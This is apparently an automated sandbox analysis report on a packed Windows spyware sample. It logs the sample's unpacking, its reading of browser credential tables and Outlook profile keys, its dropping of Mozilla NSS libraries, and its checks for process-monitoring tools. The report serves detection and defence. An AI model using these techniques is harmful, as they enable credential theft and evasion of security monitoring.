Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007040BE	0_2_007040BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F6906	0_2_005F6906
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070A248	0_2_0070A248
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066A2B0	0_2_0066A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007192AB	0_2_007192AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070534F	0_2_0070534F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070F3F8	0_2_0070F3F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00706CFA	0_2_00706CFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E5D2C	0_2_006E5D2C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068F5FA	0_2_0068F5FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00710DC3	0_2_00710DC3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F0DA4	0_2_006F0DA4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00615E29	0_2_00615E29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070C6D3	0_2_0070C6D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00715EA7	0_2_00715EA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00708762	0_2_00708762
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0071773D	0_2_0071773D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6435A0	0_2_6C6435A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655440	0_2_6C655440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B545C	0_2_6C6B545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B542B	0_2_6C6B542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BAC00	0_2_6C6BAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685C10	0_2_6C685C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C692C10	0_2_6C692C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64D4E0	0_2_6C64D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686CF0	0_2_6C686CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6564C0	0_2_6C6564C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D4D0	0_2_6C66D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A34A0	0_2_6C6A34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AC4A0	0_2_6C6AC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C656C80	0_2_6C656C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65FD00	0_2_6C65FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670512	0_2_6C670512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66ED10	0_2_6C66ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A85F0	0_2_6C6A85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680DD0	0_2_6C680DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B6E63	0_2_6C6B6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C670	0_2_6C64C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C664640	0_2_6C664640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C692E4E	0_2_6C692E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669E50	0_2_6C669E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C683E50	0_2_6C683E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A9E30	0_2_6C6A9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695600	0_2_6C695600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687E10	0_2_6C687E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B76E3	0_2_6C6B76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64BEF0	0_2_6C64BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65FEF0	0_2_6C65FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4EA0	0_2_6C6A4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AE680	0_2_6C6AE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665E90	0_2_6C665E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C659F00	0_2_6C659F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687710	0_2_6C687710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64DFE0	0_2_6C64DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C676FF0	0_2_6C676FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6977A0	0_2_6C6977A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68F070	0_2_6C68F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C668850	0_2_6C668850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D850	0_2_6C66D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B820	0_2_6C68B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C694820	0_2_6C694820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C657810	0_2_6C657810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C0E0	0_2_6C66C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6858E0	0_2_6C6858E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B50C7	0_2_6C6B50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6760A0	0_2_6C6760A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D960	0_2_6C65D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B970	0_2_6C69B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB170	0_2_6C6BB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66A940	0_2_6C66A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C9A0	0_2_6C64C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D9B0	0_2_6C67D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685190	0_2_6C685190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2990	0_2_6C6A2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C689A60	0_2_6C689A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C661AF0	0_2_6C661AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68E2F0	0_2_6C68E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C688AC0	0_2_6C688AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6422A0	0_2_6C6422A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674AA0	0_2_6C674AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65CAB0	0_2_6C65CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2AB0	0_2_6C6B2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BBA90	0_2_6C6BBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C370	0_2_6C65C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C645340	0_2_6C645340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D320	0_2_6C68D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B53C8	0_2_6C6B53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64F380	0_2_6C64F380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6894D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C67CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 003445C0 appears 316 times

Source: file.exe, 00000000.00000002.2308908482.000000006C8C5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: rrlyrqvq ZLIB complexity 0.9951279716257668

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: file.exe, 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2054617135.00000000051E0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6A7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00359600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00353720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00353720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\2Y7V9XQX.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2307761511.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2308695379.000000006C87F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2307761511.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2308695379.000000006C87F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2307761511.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2308695379.000000006C87F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2307761511.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2308695379.000000006C87F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2307761511.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2308695379.000000006C87F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2307761511.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2307761511.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2308695379.000000006C87F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2136752309.000000001D824000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2148356376.000000001D840000.00000004.00000020.00020000.00000000.sdmp, KFBFCAFCBKFIEBFHIDBA.0.dr, HJJKJJDHCGCAECAAECFH.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2307761511.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2307761511.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1825792 > 1048576

Source: file.exe

Static PE information: Raw size of rrlyrqvq is bigger than: 0x100000 < 0x197800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2308695379.000000006C87F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2308695379.000000006C87F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.340000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rrlyrqvq:EW;tntpdtef:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rrlyrqvq:EW;tntpdtef:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00359860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c31d8 should be: 0x1cdb4c

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: rrlyrqvq
Source: file.exe	Static PE information: section name: tntpdtef
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0035B035 push ecx; ret	0_2_0035B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E506E push edi; mov dword ptr [esp], ecx	0_2_007E50CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E6858 push ecx; mov dword ptr [esp], ebx	0_2_007E6963
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E6050 push ebx; mov dword ptr [esp], 3C03D873h	0_2_007E60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E6050 push ebx; mov dword ptr [esp], ebp	0_2_007E60E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078A841 push 69198C20h; mov dword ptr [esp], ebx	0_2_0078A877
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078A841 push edi; mov dword ptr [esp], edx	0_2_0078A8BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007EE01C push esi; mov dword ptr [esp], 468EE11Eh	0_2_007EE03E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0067101F push ecx; mov dword ptr [esp], edx	0_2_0067106D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0067101F push ebx; mov dword ptr [esp], edx	0_2_0067109C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0067101F push 305160D9h; mov dword ptr [esp], ecx	0_2_006710E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0067101F push 3EC6DD86h; mov dword ptr [esp], eax	0_2_00671150
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0067101F push 07FAA56Ah; mov dword ptr [esp], edi	0_2_00671158
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0067101F push eax; mov dword ptr [esp], esi	0_2_0067116D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062D8ED push ecx; mov dword ptr [esp], 388DF6D7h	0_2_0062D911
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062D8ED push ebx; mov dword ptr [esp], edx	0_2_0062D91C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062D8ED push 14B27DE8h; mov dword ptr [esp], ebp	0_2_0062D974
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062D8ED push ecx; mov dword ptr [esp], eax	0_2_0062D978
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007840E9 push edi; mov dword ptr [esp], 047E94F4h	0_2_00784106
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00828823 push ebp; mov dword ptr [esp], ecx	0_2_0082883D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007DE8D1 push ebx; mov dword ptr [esp], 7091FA14h	0_2_007DE8F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0077D8C4 push 773C2837h; mov dword ptr [esp], edx	0_2_0077DB9D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0080B04A push 54D44FECh; mov dword ptr [esp], eax	0_2_0080B2F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0080B04A push ebp; mov dword ptr [esp], eax	0_2_0080B91A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0074E0B9 push ecx; mov dword ptr [esp], ebp	0_2_0074E0C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007040BE push esi; mov dword ptr [esp], edx	0_2_007040F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007040BE push ebp; mov dword ptr [esp], eax	0_2_0070419E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007040BE push eax; mov dword ptr [esp], 72C2F165h	0_2_007041FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007040BE push eax; mov dword ptr [esp], 7EFF7BACh	0_2_0070422F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007040BE push ebx; mov dword ptr [esp], ebp	0_2_00704316
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007040BE push edi; mov dword ptr [esp], 06B13B00h	0_2_0070431F

Source: file.exe

Static PE information: section name: rrlyrqvq entropy: 7.955409843603842

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
